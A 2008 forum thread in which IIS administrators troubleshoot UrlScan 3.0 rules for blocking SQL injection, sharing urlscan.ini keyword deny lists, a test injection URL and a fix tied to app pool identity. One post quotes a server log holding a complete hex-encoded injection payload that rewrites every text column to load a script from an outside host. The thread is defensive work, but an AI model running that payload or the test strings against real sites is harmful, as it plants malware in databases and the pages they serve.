« Previous Next »

• 08-13-2008, 2:51 PM

  In reply to

  wadeh Joined on 04-19-2005, 10:17 PM Posts 112	Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact The permissions on your logging directory look fine. Since there are no 404s in the w3svc file and no entries in the urlscan.log file, it seems clear that UrlScan has not rejected any requests. If you can send me your urlscan.ini file, I can take a look at it. Thanks, -Wade

• 08-13-2008, 6:24 PM

  In reply to

  KentZhou Joined on 05-03-2006, 3:48 PM Posts 35

  Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact Hi Wade, Thank you very much for review. I fixed the issue. It's because ISAPI was set for 2 web app on same IIS instance. Now I have question for urlscan.ini: For url query string, I want to set it to filter out some key words maybe is bad, such as Delete, EXEC to avoid sql injection.  but it looks like that it must attach to specific file type. [SQL Injection] AppliesTo=.asp,.aspx  ; this means only apply to these two types file. My question is here DenyDataSection=SQL Injection Strings ScanUrl=0 ScanAllRaw=0 ScanQueryString=1 ScanHeaders= but I do not want to the config connect to any file extension. it should be for all file even there is no file. For example, maybe there url like http://myserver/mysite/mypath?a=b;@S... the app will translate the url to one type of file. how to config for this case? Is it possible to put following rules to section [DenyQueryStringSequences]? -- %3b ; a semicolon /* @ ; also catches @@ char ; also catches nchar and varchar alter begin cast convert create cursor declare delete drop end exec ; also catches execute fetch insert kill open select sys ; also catches sysobjects and syscolumns table update

• 08-14-2008, 4:08 PM

  In reply to

  wadeh Joined on 04-19-2005, 10:17 PM Posts 112

  Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact KentZhou: I do not want to the config connect to any file extension. it should be for all file even there is no file. UrlScan runs before IIS has determined whether the request targets a file or some other dynamic resource.  All of UrlScan's rules therefore apply regardless of this. The AppliesTo property is optional.  If you want to have a rule apply to all requests, and not just certain file extensions, then you can leave the AppliesTo property blank and it will apply to all reqeusts. Thanks, -Wade

• 08-15-2008, 11:24 AM

  In reply to

  apajlopez Joined on 08-15-2008, 3:14 PM Posts 2

  Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact Wade, FYI - In my test case, the reason SQL Injection attacks was not getting detected was because the rule had the "AppliesTo=" set to ".asp,.aspx".  Well, I was sending a test attack to http://localmachinename/?declare%20@s=CAST(XYZ%20AS%20NVARCHAR(3000));EXEC(@S); In this case I'm not calling any .asp or .aspx page specifically so if I launch the attack to the default page without specifying a filename.ext I can bypass the rule. By changing the "AppliesTo=.asp,.aspx" to "AppliesTo=" URLScan detects this attack. FWIW Jose Lopez

  Tags: securitySQL injection filter append URL attack

• 08-15-2008, 12:30 PM

  In reply to

  Rovastar Joined on 03-13-2008, 2:00 PM London, UK Posts 1,788	Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact Very Interesting. I'll try this too. I too left the AppliesTo in there. I just checked mine (didnt make the change above) and it is working again. I dunno maybe another IIS restart a day or two ago kicked it off or something. Luckily I will finally have some time to investigate this next week. http://www.iisportal.com

• 08-15-2008, 12:56 PM

  In reply to

  Rovastar Joined on 03-13-2008, 2:00 PM London, UK Posts 1,788

  Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact Correct it is picking it up for one site and 1 site only. Still getting hammered  did a quick search in file for CAST( on the logs 2008-08-14 08:16:46 GET /presscuttingdetails.asp id=38;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E756A6E632E72752F6A732E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);- Yet URL scan does detect [08-13-2008 - 19:53:40] Client at 118.81.53.156: Rule ' SQL Injection' detected string '--' in the query string. UrlScan is in Logging-Only mode - request allowed.  Site Instance='1992215310', Raw URL='/english/businessdirectory_map.asp I checked no-one else has restarted anything for these servers for days. Sadly I didn't have logging on the '1992215310' site as it is only our smarter stats website for clients site going on our hosting prod box. Run out of time more info later.   http://www.iisportal.com

• 08-15-2008, 7:10 PM

  In reply to

  wadeh Joined on 04-19-2005, 10:17 PM Posts 112	Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact Jose, Thanks for the follow up.  It's good to hear that you found this! -Wade

• 08-15-2008, 10:19 PM

  In reply to

  KentZhou Joined on 05-03-2006, 3:48 PM Posts 35	Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact  Hi guys, doing as following way works fine: AppliesTo=.asp,.aspx,. use dot(.) for any type even capture with no file extension

• 08-18-2008, 8:23 AM

  In reply to

  Rovastar Joined on 03-13-2008, 2:00 PM London, UK Posts 1,788	Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact Going to dedicate some time trying to work this is out over the next few days. The workaround: AppliesTo=.asp,.aspx,. Doesn't work for me.:(   http://www.iisportal.com

• 08-18-2008, 8:51 AM

  In reply to

  apajlopez Joined on 08-15-2008, 3:14 PM Posts 2

  Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact Rovastar, I can confirm that the workaround that KentZhou posted works.  I have included below the contents of the RuleList section in the UrlScan.ini as I have it in my test box. After changing the rule though I issued an iisreset /restart command before I tested so the UrlScan.ini's settings were taken into account.  I don't know if there is a cycle by which these settings in the .ini file are refreshed.  I tried issuing the following request, all of which were stopped by URLScan: http://localhost/?declare http://localhost/default.asp?declare http://localhost/default.aspx?declare RuleList=SQLInjection [SQLInjection] AppliesTo=.asp,.aspx,. DenyDataSection=SQL Injection Strings ScanUrl=0 ScanAllRaw=0 ScanQueryString=1 ScanHeaders= [SQL Injection Strings] -- %3b ; a semicolon /* @ ; also catches @@ char ; also catches nchar and varchar alter begin cast convert create cursor declare delete drop end exec ; also catches execute fetch insert kill open select sys ; also catches sysobjects and syscolumns table update

  Tags: sql injectionUrlScanURlScan SQL Injection

• 08-19-2008, 2:37 AM

  In reply to

  markeboyle Joined on 11-06-2004, 11:38 PM Posts 5

  Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact In my case I gave IIS_WPG full access to logging folder. I do run my app pool in a different local user account that is part of the IIS_WPG group so in theory it should work.  Currently I run this local user account as part of Administrator role and it runs fine (x64 iis6 w2k3sp2)  D:\common\urlscanlogs>cacls . D:\common\urlscanlogs BUILTIN\Administrators:F                       servername\IIS_WPG:(OI)(CI)F                       BUILTIN\Users:(OI)(CI)F                       BUILTIN\Administrators:(OI)(CI)F                       NT AUTHORITY\SYSTEM:(OI)(CI)F                       CREATOR OWNER:(OI)(CI)(IO)F                       BUILTIN\Users:(OI)(CI)R                       BUILTIN\Users:(CI)(special access:)                                         FILE_APPEND_DATA                       BUILTIN\Users:(CI)(special access:)                                         FILE_WRITE_DATA

• 08-19-2008, 9:07 AM

  In reply to

  Rovastar Joined on 03-13-2008, 2:00 PM London, UK Posts 1,788

  Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact apajlopez: Rovastar, I can confirm that the workaround that KentZhou posted works.  I have included below the contents of the RuleList section in the UrlScan.ini as I have it in my test box. After changing the rule though I issued an iisreset /restart command before I tested so the UrlScan.ini's settings were taken into account.  I don't know if there is a cycle by which these settings in the .ini file are refreshed.   Glad to see others are working. Mine is not. It works for *some* sites but not all. There seems to be no explanation for this that I can see. The fact that it works for some but not all is worrying as you may *think* it is working when it is not. http://www.iisportal.com

• 08-19-2008, 9:22 AM

  In reply to

  Rovastar Joined on 03-13-2008, 2:00 PM London, UK Posts 1,788	Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact Investigating http://www.iisportal.com

• 08-19-2008, 10:01 AM

  In reply to

  Rovastar Joined on 03-13-2008, 2:00 PM London, UK Posts 1,788

  Re: UrlScan 3.0 Beta not capturing SQL Injection Reply Contact OK I am finally getting somewhere. On one of my servers out of several hundred sites 2 seems to be logging others do not. Now I noticed that these sites have separate application pools. I moved a known problem site to a new application pool and then the events were logged. Moving it back to the DefaultAppPool it didn't log. Further investigation of the difference between the application pool reviled that the DefaultAppPool had a Identity of IWAN user rather than the default Network Services. When I changing the newly created app pool to run under the IWAM user account (and restarting the app pool) URLscan failed to work. Changing it to Network Service account (and restarting the App Pool.) It all worked again. So my problem at least is down to which identity you run an app pool in to determine if  URLScan will work or not. *Phew* Glad that problem is out of the way. http://www.iisportal.com